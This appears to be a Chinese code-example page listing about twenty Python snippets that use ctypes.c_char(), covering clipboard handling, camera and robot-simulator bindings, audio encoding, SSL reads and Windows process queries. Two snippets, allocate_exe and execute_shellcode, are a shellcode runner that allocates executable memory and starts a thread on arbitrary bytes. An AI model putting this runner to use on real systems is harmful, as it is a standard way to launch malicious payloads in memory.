我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用ctypes.c_char()。
def clip_files(file_list): offset = ctypes.sizeof(DROPFILES) length = sum(len(p) + 1 for p in file_list) + 1 size = offset + length * ctypes.sizeof(ctypes.c_wchar) buf = (ctypes.c_char * size)() df = DROPFILES.from_buffer(buf) df.pFiles, df.fWide = offset, True for path in file_list: path = path.decode('gbk') print "copying to clipboard, filename = " + path array_t = ctypes.c_wchar * (len(path) + 1) path_buf = array_t.from_buffer(buf, offset) path_buf.value = path offset += ctypes.sizeof(path_buf) stg = pythoncom.STGMEDIUM() stg.set(pythoncom.TYMED_HGLOBAL, buf) win32clipboard.OpenClipboard() win32clipboard.EmptyClipboard() try: win32clipboard.SetClipboardData(win32clipboard.CF_HDROP, stg.data) print "clip_files() succeed" finally: win32clipboard.CloseClipboard()
def synchronized(obj, lock=None): assert not isinstance(obj, SynchronizedBase), 'object already synchronized' if isinstance(obj, ctypes._SimpleCData): return Synchronized(obj, lock) elif isinstance(obj, ctypes.Array): if obj._type_ is ctypes.c_char: return SynchronizedString(obj, lock) return SynchronizedArray(obj, lock) else: cls = type(obj) try: scls = class_cache[cls] except KeyError: names = [field[0] for field in cls._fields_] d = dict((name, make_property(name)) for name in names) classname = 'Synchronized' + cls.__name__ scls = class_cache[cls] = type(classname, (SynchronizedBase,), d) return scls(obj, lock) # # Functions for pickling/unpickling #
def simxGetLastErrors(clientID, operationMode): ''' Please have a look at the function description/documentation in the V-REP user manual ''' errors =[] errorCnt = ct.c_int() errorStrings = ct.POINTER(ct.c_char)() ret = c_GetLastErrors(clientID, ct.byref(errorCnt), ct.byref(errorStrings), operationMode) if ret == 0: s = 0 for i in range(errorCnt.value): a = bytearray() while errorStrings[s] != b'\0': if sys.version_info[0] == 3: a.append(int.from_bytes(errorStrings[s],'big')) else: a.append(errorStrings[s]) s += 1 s += 1 #skip null if sys.version_info[0] == 3: errors.append(str(a,'utf-8')) else: errors.append(str(a)) return ret, errors
def simxGetStringParameter(clientID, paramIdentifier, operationMode): ''' Please have a look at the function description/documentation in the V-REP user manual ''' paramValue = ct.POINTER(ct.c_char)() ret = c_GetStringParameter(clientID, paramIdentifier, ct.byref(paramValue), operationMode) a = bytearray() if ret == 0: i = 0 while paramValue[i] != b'\0': if sys.version_info[0] == 3: a.append(int.from_bytes(paramValue[i],'big')) else: a.append(paramValue[i]) i=i+1 if sys.version_info[0] == 3: a=str(a,'utf-8') else: a=str(a) return ret, a
def simxGetDialogInput(clientID, dialogHandle, operationMode): ''' Please have a look at the function description/documentation in the V-REP user manual ''' inputText = ct.POINTER(ct.c_char)() ret = c_GetDialogInput(clientID, dialogHandle, ct.byref(inputText), operationMode) a = bytearray() if ret == 0: i = 0 while inputText[i] != b'\0': if sys.version_info[0] == 3: a.append(int.from_bytes(inputText[i],'big')) else: a.append(inputText[i]) i = i+1 if sys.version_info[0] == 3: a=str(a,'utf-8') else: a=str(a) return ret, a
def _get_video_data(id_, timeout, buffer_=None): if buffer_ is None: whbi = _get_roi_format(id_) sz = whbi[0] * whbi[1] if whbi[3] == ASI_IMG_RGB24: sz *= 3 elif whbi[3] == ASI_IMG_RAW16: sz *= 2 buffer_ = bytearray(sz) else: if not isinstance(buffer_, bytearray): raise TypeError('Supplied buffer must be a bytearray') sz = len(buffer_) cbuf_type = c.c_char * len(buffer_) cbuf = cbuf_type.from_buffer(buffer_) r = zwolib.ASIGetVideoData(id_, cbuf, sz, int(timeout)) if r: raise zwo_errors[r] return buffer_
def _get_data_after_exposure(id_, buffer_=None): if buffer_ is None: whbi = _get_roi_format(id_) sz = whbi[0] * whbi[1] if whbi[3] == ASI_IMG_RGB24: sz *= 3 elif whbi[3] == ASI_IMG_RAW16: sz *= 2 buffer_ = bytearray(sz) else: if not isinstance(buffer_, bytearray): raise TypeError('Supplied buffer must be a bytearray') sz = len(buffer_) cbuf_type = c.c_char * len(buffer_) cbuf = cbuf_type.from_buffer(buffer_) r = zwolib.ASIGetDataAfterExp(id_, cbuf, sz) if r: raise zwo_errors[r] return buffer_
def ppid(self): """Parent Process ID :type: :class:`int` """ if windows.current_process.bitness == 32 and self.bitness == 64: xtype = windows.remotectypes.transform_type_to_remote64bits(PROCESS_BASIC_INFORMATION) # Fuck-it <3 data = (ctypes.c_char * ctypes.sizeof(xtype))() windows.syswow64.NtQueryInformationProcess_32_to_64(self.handle, ProcessInformation=data, ProcessInformationLength=ctypes.sizeof(xtype)) # Map a remote64bits(PROCESS_BASIC_INFORMATION) at the address of 'data' x = xtype(ctypes.addressof(data), windows.current_process) else: information_type = 0 x = PROCESS_BASIC_INFORMATION() winproxy.NtQueryInformationProcess(self.handle, information_type, x) return x.InheritedFromUniqueProcessId
def peb_syswow_addr(self): if not self.is_wow_64: raise ValueError("Not a syswow process") if windows.current_process.bitness == 64: information_type = 0 x = PROCESS_BASIC_INFORMATION() winproxy.NtQueryInformationProcess(self.handle, information_type, x) peb_addr = ctypes.cast(x.PebBaseAddress, PVOID).value return peb_addr else: #current is 32bits x = windows.remotectypes.transform_type_to_remote64bits(PROCESS_BASIC_INFORMATION) # Fuck-it <3 data = (ctypes.c_char * ctypes.sizeof(x))() windows.syswow64.NtQueryInformationProcess_32_to_64(self.handle, ProcessInformation=data, ProcessInformationLength=ctypes.sizeof(x)) peb_offset = x.PebBaseAddress.offset peb_addr = struct.unpack("<Q", data[x.PebBaseAddress.offset: x.PebBaseAddress.offset+8])[0] return peb_addr # Not a fixedpropety to prevent ref-cycle and uncollectable WinProcess # Try with a weakref ?
def try_enc(): import os inFile = open('x.wav', 'rb') inFile.seek(0, os.SEEK_END) wavFileSize = inFile.tell() inFile.seek(44) # skip wav header outFile = open('x.mp3', 'wb') lame = LameEncoder(44100,1,128) while(1): inBytes = inFile.read(512) if inBytes == '': break #inBuf = ctypes.create_string_buffer(inBytes, 512) sample_count = len(inBytes) /2 output_buff_len = int(1.25 * sample_count + 7200) output_buff = (ctypes.c_char*output_buff_len)() lame.dll.lame_encode_buffer.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_char), ctypes.c_int]; output_size = lame.dll.lame_encode_buffer(lame.lame, inBytes, 0, len(inBytes)/2, output_buff, output_buff_len); outFile.write(output_buff[0:output_size]) outFile.close()
def allocate_exe(shellcode): ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def execute_shellcode(shellcode): shellcode=bytearray(shellcode) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def role(self): """The iperf3 instance role valid roles are 'c'=client and 's'=server :rtype: 'c' or 's' """ try: self._role = c_char( self.lib.iperf_get_test_role(self._test) ).value.decode('utf-8') except TypeError: self._role = c_char( chr(self.lib.iperf_get_test_role(self._test)) ).value.decode('utf-8') return self._role
def create_read_console(get_text): code = [None] def _read_console(p, buf, buflen, add_history): if not code[0]: text = get_text(p.decode(ENCODING), add_history) if text is None: return 0 code[0] = text.encode(ENCODING) addr = ctypes.addressof(buf.contents) c2 = (ctypes.c_char * buflen).from_address(addr) nb = min(len(code[0]), buflen - 2) c2[:nb] = code[0][:nb] if nb < buflen - 2: c2[nb:(nb + 2)] = b'\n\0' code[0] = code[0][nb:] return 1 return _read_console
def FillConsoleOutputCharacter(stream_id, char, length, start): handle = handles[stream_id] char = c_char(char.encode()) length = wintypes.DWORD(length) num_written = wintypes.DWORD(0) # Note that this is hard-coded for ANSI (vs wide) bytes. success = _FillConsoleOutputCharacterA( handle, char, length, start, byref(num_written)) return num_written.value
def recv_into(self, buffer, nbytes=None): # Read short on EOF. if self._closed: return 0 if nbytes is None: nbytes = len(buffer) buffer = (ctypes.c_char * nbytes).from_buffer(buffer) processed_bytes = ctypes.c_size_t(0) with self._raise_on_error(): result = Security.SSLRead( self.context, buffer, nbytes, ctypes.byref(processed_bytes) ) # There are some result codes that we want to treat as "not always # errors". Specifically, those are errSSLWouldBlock, # errSSLClosedGraceful, and errSSLClosedNoNotify. if (result == SecurityConst.errSSLWouldBlock): # If we didn't process any bytes, then this was just a time out. # However, we can get errSSLWouldBlock in situations when we *did* # read some data, and in those cases we should just read "short" # and return. if processed_bytes.value == 0: # Timed out, no data read. raise socket.timeout("recv timed out") elif result in (SecurityConst.errSSLClosedGraceful, SecurityConst.errSSLClosedNoNotify): # The remote peer has closed this connection. We should do so as # well. Note that we don't actually return here because in # principle this could actually be fired along with return data. # It's unlikely though. self.close() else: _assert_no_error(result) # Ok, we read and probably succeeded. We should return whatever data # was actually read. return processed_bytes.value
def __init__(self, array): CTypeArray.__init__(self, c_char, array)
def create_shader(self, strings, shader_type): count = len(strings) # if we have no source code, ignore this shader if count < 1: return # create the shader handle shader = glCreateShader(shader_type) shaderstrings = [] for string in strings: shaderstrings.append(bytes(string, 'ascii')) # convert the source strings into a ctypes pointer-to-char array, and # upload them this is deep, dark, dangerous black magic - don't try # stuff like this at home! src = (c_char_p * count)(*shaderstrings) glShaderSource(shader, count, cast( pointer(src), POINTER(POINTER(c_char))), None) # compile the shader glCompileShader(shader) temp = c_int(0) # retrieve the compile status glGetShaderiv(shader, GL_COMPILE_STATUS, byref(temp)) # if compilation failed, print the log if not temp: # retrieve the log length glGetShaderiv(shader, GL_INFO_LOG_LENGTH, byref(temp)) # create a buffer for the log buffer = create_string_buffer(temp.value) # retrieve the log text glGetShaderInfoLog(shader, temp, None, buffer) # print the log to the console print(buffer.value) else: # all is well, so attach the shader to the program glAttachShader(self.handle, shader)
def tobytes(self): return cast(self.buffer, POINTER(c_char))[0:self._len]
def _get_tcp_ipv4_sockets(): size = ctypes.c_uint(0) try: winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET) except winproxy.IphlpapiError: pass # Allow us to set size to the needed value buffer = (ctypes.c_char * size.value)() winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET) t = get_MIB_TCPTABLE_OWNER_PID_from_buffer(buffer) return list(t.table)
def _get_tcp_ipv6_sockets(): size = ctypes.c_uint(0) try: winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET6) except winproxy.IphlpapiError: pass # Allow us to set size to the needed value buffer = (ctypes.c_char * size.value)() winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET6) t = get_MIB_TCP6TABLE_OWNER_PID_from_buffer(buffer) return list(t.table)